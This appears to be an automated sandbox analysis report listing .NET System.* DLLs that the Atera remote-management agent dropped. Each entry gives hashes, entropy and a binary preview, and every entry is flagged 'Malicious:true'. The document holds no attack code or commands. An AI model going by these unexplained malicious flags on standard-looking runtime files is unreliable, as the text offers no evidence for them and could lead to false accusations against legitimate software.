                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ...............................%....@..................................(..O....@.. ...............((...`......d'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......|...#Strings....p.......#US.t.......#GUID...........#Blob......................3............................................................`.....1.....t.................s.....).....B.................].........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.5...K.U...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.TraceSource.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.7775085279315626
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:1eIZnWlNWTaNyb8E9VF6IYijSJIVxpcstKT:kUyo6EpYi60Po
                                                                                                                                                                                                                                                                                              MD5:20430B56AF201F3DF8DC7ADD77C700DF
                                                                                                                                                                                                                                                                                              SHA1:B4D021243BEEE7CD50AB7885ABBF15F0BF530578
                                                                                                                                                                                                                                                                                              SHA-256:EB04AC7564191B2CBFE425BF0E1C5AFAFDD56E95EF43410B46849B859C607FCB
                                                                                                                                                                                                                                                                                              SHA-512:CEA66D7B73E25725696D5B46E1BB3D26280B15A7DB665AF6FAD75685D41D6A759291732559D7D95E9F99140AAC29C94F0393FD9A22084C6C20C347E55DBA560B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............2*... ...@....... ...............................:....@..................................)..O....@..P...............((...`.......(............................................... ............... ..H............text...8.... ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................*......H.......P ......................((......................................BSJB............v4.0.30319......l...\...#~..........#Strings............#US.........#GUID...........#Blob......................3............................................................t...................................=.....V.................q.....Z...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Tracing.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25640
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.492795908704385
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:7lQnCMi33333333kj8xe+5PTYM3zUy+CezHjzgKj0uRWOdWmWJdWZ+Nyb8E9VF65:JQq33333333kX+TBi8OGEpYi60/k
                                                                                                                                                                                                                                                                                              MD5:BAC4ED28712BC3D20E634372041074CC
                                                                                                                                                                                                                                                                                              SHA1:3035E7EBB1B7D9830FD3711231276506A8B5B59D
                                                                                                                                                                                                                                                                                              SHA-256:DC70596E0963C1256F437BCC4EE6529A7B97119C2484845498B142EB4A18A921
                                                                                                                                                                                                                                                                                              SHA-512:5D6D4F42FD3DE579874DA7B39569B00F3A9DECD12759929DE58AD9D1A436DE787AB0EA5D67FD6C1D6558463E7B47A1222F23F67A3182E1A7E8AA172DCD23A71A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.............RM... ...`....... ....................................@..................................L..O....`..x............<..((..........PL............................................... ............... ..H............text...X-... ...................... ..`.rsrc...x....`.......0..............@..@.reloc...............:..............@..B................3M......H.......8*...!...................K.......................................0..H........(.....-.r...ps....z.-.r...ps....z.(......}......(#...}.....{.....o....*"..(....*....0..Z.............%.r#..p.%..{.....%.rA..p.%..{..........%.rS..p.%..{....l.{....l[...ra..p(.....(....*&...{....*.0..4.................}......+....{.....".......X.....{.....i2.*.0..k..........{........{..........."....(.......X....{.....i.0%.(..........(.....(.......,..(........"....3.....}....*.......=..M......

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Drawing.Primitives.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.848738207274033
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:728YFlXulWY/WGONyb8E9VF6IYijSJIVxKD9IPGp:70qX2EpYi60Tm
                                                                                                                                                                                                                                                                                              MD5:C1B2DE83AEF8C5E20E17941C4999C314
                                                                                                                                                                                                                                                                                              SHA1:20F7DCF53F0B030E70C84DF4E4277C93DFF6B6AA
                                                                                                                                                                                                                                                                                              SHA-256:7060B1D86EF099D021D16A649DE7137D8517C5E554E1F44B41173CA8B9994D73
                                                                                                                                                                                                                                                                                              SHA-512:3610FB8097A6A29529DD5E21D2BC8E7A3CBB18D2BE071FBE198308B3242D5EA6429BDAD47363D5BAE862F5FF837D0E2DAFB779CB9002E08D55D0E45A0FD13BAE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ...............................A....@..................................(..O....@.. ...............((...`......t'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~..,...P...#Strings....|.......#US.........#GUID...........#Blob......................3......................................................~.....R..... .....f.................e...........4.....}...........O.....8...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Dynamic.Runtime.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16424
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.72671079918751
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:duMLcdQ5MW9MWYONyb8E9VF6IYijSJIVx3EDQL:8OcSpS2EpYi60K+
                                                                                                                                                                                                                                                                                              MD5:A0D4D09BE1D6009408C6EB7E93768012
                                                                                                                                                                                                                                                                                              SHA1:4C1BDC43B169CDB2869C1C98DFE9A91EB15633D9
                                                                                                                                                                                                                                                                                              SHA-256:4B9138560B475B50BCBFCBD348A82CBF258E9886682CC05EA33BE2CBF0A03F48
                                                                                                                                                                                                                                                                                              SHA-512:7CEABCF983852EC62CFAE6C739092E09EC44FE7AB3904E248AA9DBA83F7BBD61E1DBF817BF92B4D59E3EA638A7271E5F3F63E614E93FCA123F21AAC25220AA37
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............,... ...@....... ...................................@..................................+..O....@..................((...`.......*............................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H.......P .......................*......................................BSJB............v4.0.30319......l.......#~..p...0...#Strings............#US.........#GUID...........#Blob......................3................................................;.........................$.....$.....$.....$...[.$...t.$.....$.....$.........g.$.....#...........e.....e.....e...).e...1.e...9.e...A.e...I.e...Q.e...Y.e...a.e...i.e...q.e.......................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Calendars.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.817024517717208
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:sZ7RqXWDRqlRqj0RqFWqENyb8E9VF6IYijSJIVxVaJrCC:Q9qKqjqjuq5kEpYi60KCC
                                                                                                                                                                                                                                                                                              MD5:37F1EF0A6AA2466C2F554504C53C2D10
                                                                                                                                                                                                                                                                                              SHA1:31DD8D50CBE9C4595A7CC7D7815BA428227E9892
                                                                                                                                                                                                                                                                                              SHA-256:F79DC628564995DEEE92F105511FD82E8B3CA3929B6D67529730833DAE6C4E9F
                                                                                                                                                                                                                                                                                              SHA-512:0022E149D9CE976D56687781461E604759E0BC36E46E4D6A9B003F8F22ABB76B11B1CDD4E06A2718B1247C7BBA4AF15A94AC91F6FA43A9AAFA396FE993BF6301
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............*... ...@....... ...............................Q....@.................................X*..O....@..P...............((...`...... )............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................*......H.......P ..P....................(......................................BSJB............v4.0.30319......l...L...#~......l...#Strings....$.......#US.(.......#GUID...8.......#Blob......................3......................................z...............\.....0.....%.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Extensions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20008
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.628825890980245
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:YNBMbljRC+lgfS1RPWYR1Rw0R9WYRPWYRDRj0R9W7eNyb8E9VF6IYijSJIVx3dU2:YvMhF2SzNzwu/NljuQmEpYi6022
                                                                                                                                                                                                                                                                                              MD5:0F8AD89B93E9F4127DCB11B4F391AD46
                                                                                                                                                                                                                                                                                              SHA1:CD0374B06A4C3962F4E3FE177907059FE7EDC2C9
                                                                                                                                                                                                                                                                                              SHA-256:BC753E8BC6A07731B5BF2D5663150CD4691B322A04D82CC53A3E64FCA8D55FDF
                                                                                                                                                                                                                                                                                              SHA-512:6ED91FC9F2CCF9369BB6BC952035012AA5D5C5BA93A61CF98306E9E9DF843EAF8CCF0A6115C172D0A56B50BC2B5DCDBA5ED8A57CAD7D26C6E653C46976FFBCCE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............6... ...@....... ...................................@.................................a6..O....@...............&..((...`.......5............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................6......H........"..H............4......(5........................................o....*"..o....*..o....*"..o....*j~....%-.&(....s....%.....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*......(....*...0..K........-.r1..ps....z. ...@3.(....*. ....3.(....*. ...._,.(....rI..ps..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.898261756295843
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:1Z4RLWdRfRJ0RZWDeNyb8E9VF6IYijSJIVxlydN:1ZK0pJuImEpYi60oP
                                                                                                                                                                                                                                                                                              MD5:292641CBE4EFE988E1D56A5245503090
                                                                                                                                                                                                                                                                                              SHA1:CDCC2464376F76994BABD97BF2A17A7D302E0153
                                                                                                                                                                                                                                                                                              SHA-256:DB686D7BCAAB90B5117C320CD799B9725773A764CBA52A78797ED3CBAE22BA54
                                                                                                                                                                                                                                                                                              SHA-512:821DCF439AC3C0C4A1DDABE1CF40B0FA0E6660940F7F9B585F23E21A4B5D2BFB809A38F1549397250A4733BC0E1FD42B12FC74A5D66BEE3942F2E7C23A07F7F6
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ..............................5t....@..................................)..O....@..................((...`......h(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l...0...#~..........#Strings....x.......#US.|.......#GUID...........#Blob......................3......................................................m.....A.{.........U.................T...........#.....l...........>.....'...................u.....u.....u...).u...1.u...9.u...A.u...I.u...Q.u...Y.u...a.u...i.u...q.u.......................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.ZipFile.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.796379783430149
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:NYWsmWIyNyb8E9VF6IYijSJIVx39mFdcmx:N2wSEpYi60Qwmx
                                                                                                                                                                                                                                                                                              MD5:144114AEF753E8A677B4B2B8C4CC5BA4
                                                                                                                                                                                                                                                                                              SHA1:827364BEC24CFBD5FF52B1A0797BA3981E520FFB
                                                                                                                                                                                                                                                                                              SHA-256:07F2FD794258FAADAE4BBAE88B5C4C5A840F108087DEF92C970233D3D8AE8858
                                                                                                                                                                                                                                                                                              SHA-512:D3D7D4CF244B64787244C0547F4810C64B5B1A5FD7017FF215A68561C30DD609ED70B2BC81844996FD16D4064D88EF175CDFA63489622B4D72358B88D42E2A27
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............*(... ...@....... ...............................\....@..................................'..O....@..@...............((...`.......&............................................... ............... ..H............text...0.... ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P ...................... &......................................BSJB............v4.0.30319......l.......#~......D...#Strings....8.......#US.<.......#GUID...L.......#Blob......................3......................................................z.....N.....".....b.................a...........0.....y...........K.....4...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........:.....C.....b...#.k...+.k...3.k...;.....C.....K.....S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):105000
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.3817920096587635
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:qvc/U5yNq2oS4Zd0LE3YigSFvhoZO2K3aAYH2TfXmNoJXBA760:mgk1tiLMYiDFvxqrWDWNoJXBAv
                                                                                                                                                                                                                                                                                              MD5:8DDFC9B1361578BDD5612ACC51313DA6
                                                                                                                                                                                                                                                                                              SHA1:630346D2670DE69362A3267DAE11EA6726003559
                                                                                                                                                                                                                                                                                              SHA-256:647D5BFA5108E79A1E1738C34C321088E7B8F30366881D94695DF52E547FADC9
                                                                                                                                                                                                                                                                                              SHA-512:F4B3AD4BD7C049C0F5D4408BB4834936E3EB5ECEE139F426F32704D40201EA75BCADF6B6EB32FE79B9F8AD1D609D739D2638E45693D5A8A55CFD933173A1FA7B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..d...........W... ........... .............................._P....@.................................5W..O....................r..((...........V............................................... ............... ..H............text....b... ...d.................. ..`.rsrc................f..............@..@.reloc...............p..............@..B................iW......H........................9.......V......................................j~....%-.&(I...s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2r7..p.(....*2rs..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2r=..p.(....*2r_..p.(....*2r...p.(....*2r...p.(....*2r...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.DriveInfo.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.855234936441404
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:dKcuz1W1cWliNyb8E9VF6IYijSJIVxLnKXE:Xu8niEpYi60b/
                                                                                                                                                                                                                                                                                              MD5:054FDA357AAC158ABB7DCB603E618468
                                                                                                                                                                                                                                                                                              SHA1:30D78707EB7ED4B135A3DCC0D2789EF34EE5008B
                                                                                                                                                                                                                                                                                              SHA-256:D690AFCD79AB3F1E8FE0F87922A694F1207F23E7AF74B9D507CB0719B71E6162
                                                                                                                                                                                                                                                                                              SHA-512:91C419A37778A608310C1FFA4459942A2E64B8FEE8B03192D0AB78D879F52525CF37B5E2D31178A4C14FBD8BC58238127D275EF7FBCC18148FD48535E9B5C41B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ..............................m#....@..................................(..O....@..P...............((...`......H'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P ..x....................&......................................BSJB............v4.0.30319......l.......#~......H...#Strings....L.......#US.P.......#GUID...`.......#Blob......................3......................................................p.....D.....9.....X.................W...........&.....o...........A.....*...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Primitives.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.859586983074765
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:c+SWikW0uNyb8E9VF6IYijSJIVxAd5iwp:c+eGWEpYi60Cdp
                                                                                                                                                                                                                                                                                              MD5:6A9CCA0177140202310B5E38CA0C8FF4
                                                                                                                                                                                                                                                                                              SHA1:6443604982F8F9A3E1B5D713DB1E52D401CC0F52
                                                                                                                                                                                                                                                                                              SHA-256:F6B1EE80B31CC0383A6C4F7116BB84EBB41CFDD5AACEB43986308A146077F381
                                                                                                                                                                                                                                                                                              SHA-512:D34427448ADCFA0B140BA777FE0EF266AD04843C3848EA8EA238BA457EDFF2C1023E7E891A811433491A60B2834BAE734656D764B0F2FB55C6632517D1200BA9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@..P...............((...`......d'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......X...#Strings....h.......#US.l.......#GUID...|.......#Blob......................3......................................................y.....M...........a.................`.........../.....x...........J.....3...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Watcher.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.907435412972442
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:pDxxhREWzgW5APUNyby2sE9jBF6IYiYF85S35IVnxGUHF76am939Ys:FAWzgWSsNyb8E9VF6IYijSJIVxXm+s
                                                                                                                                                                                                                                                                                              MD5:8A94A3BFDE0A59D784A3408F43D7714E
                                                                                                                                                                                                                                                                                              SHA1:CE74C4C089A298FB2E53DB905E938ED866FD7CCC
                                                                                                                                                                                                                                                                                              SHA-256:266EEB7F43B68684C44E1926593F5F4DEAFD5048BC552835152DC9649E738F9E
                                                                                                                                                                                                                                                                                              SHA-512:4015E73F7C7099BEF4E2961A1AACD1F3AC25C99B54F92632E94DE0B3AB4F19E0144CDC5B06A56029A73C2A6644CDC990D2A11CA2BB5D5F31E92B6E07712CA4F8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ...............................4....@.................................p)..O....@..@...............((...`......8(............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................)......H.......P ..h....................'......................................BSJB............v4.0.30319......l.......#~..d.......#Strings....@.......#US.D.......#GUID...T.......#Blob......................3..................................................C...f.C...:.0...c.....N.................M.................e...........7..... ...................*.....*.....*...).*...1.*...9.*...A.*...I.*...Q.*...Y.*...a.*...i.*...q.*.......................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.863130152483049
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:6BLRWbYWziZNyb8E9VF6IYijSJIVx7cHr:6B2xi9EpYi60YL
                                                                                                                                                                                                                                                                                              MD5:878FED5CA4CBAA9282B1EB608C2312CC
                                                                                                                                                                                                                                                                                              SHA1:D07131A22C8E51830D64607EA61A71FD0064A78E
                                                                                                                                                                                                                                                                                              SHA-256:91850B2A878630B4F96CF6B5D5695361BDA4D3E57A8589C8FB68CFF75FF3B761
                                                                                                                                                                                                                                                                                              SHA-512:631EC942C1FDF73C016694B345609B9D821A427E79D4190A21A12442C65650E793E74B2247978B23DE97D1109D885AD1C5F7031D18B7502B01E298355828272D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............b)... ...@....... ....................................@..................................)..O....@..................((...`.......'............................................... ............... ..H............text...h.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................D)......H.......P ......................X'......................................BSJB............v4.0.30319......l.......#~..X.......#Strings............#US.........#GUID...........#Blob......................3................................................../...z./...N.....O.....b.................a...........0.....y...........K.....4...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.IsolatedStorage.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.85257775718915
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:hZxcMRW4/W5TPPNyby2sE9jBF6IYiYF85S35IVnxGUHFyF5yzli:5HW4/W1HNyb8E9VF6IYijSJIVx+qU
                                                                                                                                                                                                                                                                                              MD5:4D61CCEF5CC2784846B379DE467BFCF7
                                                                                                                                                                                                                                                                                              SHA1:0F1A10F294CD97FB5B21CBFABE7D41A060F9DD38
                                                                                                                                                                                                                                                                                              SHA-256:E2E5B92DFA1195E2DD1DBD15D8E4C36365862C33105BCFF7E84CFA72F90CE512
                                                                                                                                                                                                                                                                                              SHA-512:969F11D0DEEE273AD68BC3C9B7224A3E38BA227077B0760332C7D603761A12594DD66338C58A08D798A67F00F91861CE104E792BAAA7D4014CC2304EB177EBFE
                                                                                                                                                                                                                                                                                              Malicious:true
